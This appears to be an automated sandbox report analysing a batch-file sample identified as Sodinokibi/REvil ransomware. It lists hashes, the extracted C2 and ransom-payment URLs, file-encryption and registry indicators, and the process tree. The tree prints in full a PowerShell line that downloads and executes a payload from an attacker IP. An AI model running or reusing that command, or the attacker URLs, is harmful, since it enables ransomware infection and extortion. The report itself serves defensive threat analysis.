Analysis
- max time kernel: 150s
- max time network: 149s
- platform: windows10_x64
- resource: win10
- submitted: 03-09-2020 21:10
Static task: static1
Behavioral task: behavioral1
- Sample: 3ebef916c89bfab6725e5179bc66e52e.bat
- Resource: win7v200722
Behavioral task: behavioral2
- Sample: 3ebef916c89bfab6725e5179bc66e52e.bat
- Resource: win10
General
- Target: 3ebef916c89bfab6725e5179bc66e52e.bat
- Size: 220B
- MD5: ffba72e711c822550ffada7128fa23c1
- SHA1: 8e0fecaddf1765771895425d408b902606e17e69
- SHA256: 0c2979fbb38e64c1f010da3bf048f308add447789e3490462a4a2914882501bc
- SHA512: 4863cc96608a32708f4843bdb275bedfd88435e55316a38ff22e4fbf7453fd194785a8c9f78efe55e3d3149e9dbdb284517a1d6d4f1bff25ea8abe457be7e1a7
Malware Config
- Extracted: http://185.103.242.78/pastes/3ebef916c89bfab6725e5179bc66e52e
- Extracted: C:\01p7fq-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E16582DF25936703
  http://decryptor.cc/E16582DF25936703
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (75 IoCs)
  Processes: powershell.exe
  flow | pid | process
  powershell.exe (pid 804) on flows 8, 13, 15, 17, 19, 21, 23, 25, 27, 30, 33, 35, 37, 39, 41, 43, 45, 47, 49, 51, 53, 55, 56, 57, 58, 60, 62, 63, 65, 67, 69, 71, 73, 75, 77, 79, 81, 83, 85, 87, 89, 91, 93, 95, 97, 99, 101, 103, 105, 107, 109, 111, 113, 115, 117, 119, 122, 124, 126, 128, 130, 132, 134, 136
- Modifies extensions of user files (5 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  description | ioc | process
  File renamed | C:\Users\Admin\Pictures\OutExport.tif => \??\c:\users\admin\pictures\OutExport.tif.01p7fq | powershell.exe
  File renamed | C:\Users\Admin\Pictures\SwitchProtect.tif => \??\c:\users\admin\pictures\SwitchProtect.tif.01p7fq | powershell.exe
  File renamed | C:\Users\Admin\Pictures\UnprotectCompress.tif => \??\c:\users\admin\pictures\UnprotectCompress.tif.01p7fq | powershell.exe
  File opened for modification | \??\c:\users\admin\pictures\EnterUnblock.tiff | powershell.exe
  File renamed | C:\Users\Admin\Pictures\EnterUnblock.tiff => \??\c:\users\admin\pictures\EnterUnblock.tiff.01p7fq | powershell.exe
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9tzs299f233.bmp" | powershell.exe
- Drops file in Program Files directory (22 IoCs)
  Processes: powershell.exe
  description | ioc | process
  File created | \??\c:\program files (x86)\01p7fq-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\CompareRegister.vsdm | powershell.exe
  File opened for modification | \??\c:\program files\PushExpand.dot | powershell.exe
  File opened for modification | \??\c:\program files\SwitchRequest.aiff | powershell.exe
  File opened for modification | \??\c:\program files\RegisterProtect.wma | powershell.exe
  File opened for modification | \??\c:\program files\RemoveUndo.wmx | powershell.exe
  File created | \??\c:\program files\01p7fq-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\CompressResume.M2TS | powershell.exe
  File opened for modification | \??\c:\program files\ConfirmStep.odt | powershell.exe
  File opened for modification | \??\c:\program files\ConvertToUndo.jtx | powershell.exe
  File opened for modification | \??\c:\program files\FormatHide.doc | powershell.exe
  File opened for modification | \??\c:\program files\ProtectStep.mov | powershell.exe
  File opened for modification | \??\c:\program files\UnlockPop.dotx | powershell.exe
  File opened for modification | \??\c:\program files\InitializeSync.xsl | powershell.exe
  File opened for modification | \??\c:\program files\RepairConnect.aifc | powershell.exe
  File opened for modification | \??\c:\program files\SaveExit.vdx | powershell.exe
  File opened for modification | \??\c:\program files\CheckpointAdd.ogg | powershell.exe
  File opened for modification | \??\c:\program files\DisconnectFormat.wax | powershell.exe
  File opened for modification | \??\c:\program files\FormatSearch.dwg | powershell.exe
  File opened for modification | \??\c:\program files\MoveCopy.xlsm | powershell.exe
  File opened for modification | \??\c:\program files\RegisterUninstall.js | powershell.exe
  File opened for modification | \??\c:\program files\SwitchNew.htm | powershell.exe
- Drops file in Windows directory (1 IoCs)
  Processes: svchost.exe
  description | ioc | process
  File opened for modification | C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat | svchost.exe
- Modifies data under HKEY_USERS (5 IoCs)
  Processes: svchost.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" | svchost.exe
  Set value (data) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = ec84d4173682d601 | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" | svchost.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe
  pid | process
  804 | powershell.exe (5 occurrences)
- Suspicious use of AdjustPrivilegeToken (8 IoCs)
  Processes: svchost.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeShutdownPrivilege | 1180 | svchost.exe
  Token: SeCreatePagefilePrivilege | 1180 | svchost.exe
  Token: SeDebugPrivilege | 804 | powershell.exe
  Token: SeDebugPrivilege | 804 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 804 | powershell.exe
  Token: SeBackupPrivilege | 3968 | vssvc.exe
  Token: SeRestorePrivilege | 3968 | vssvc.exe
  Token: SeAuditPrivilege | 3968 | vssvc.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: cmd.exe
  description | pid | process | target process
  PID 2784 wrote to memory of 804 | 2784 | cmd.exe | powershell.exe
  PID 2784 wrote to memory of 804 | 2784 | cmd.exe | powershell.exe
  PID 2784 wrote to memory of 804 | 2784 | cmd.exe | powershell.exe
Processes
- C:\Windows\system32\cmd.exe (PID 2784)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3ebef916c89bfab6725e5179bc66e52e.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 804, child of 2784)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3ebef916c89bfab6725e5179bc66e52e');Invoke-BBWAIYOYNUVEV;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\svchost.exe (PID 1180)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 3968)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken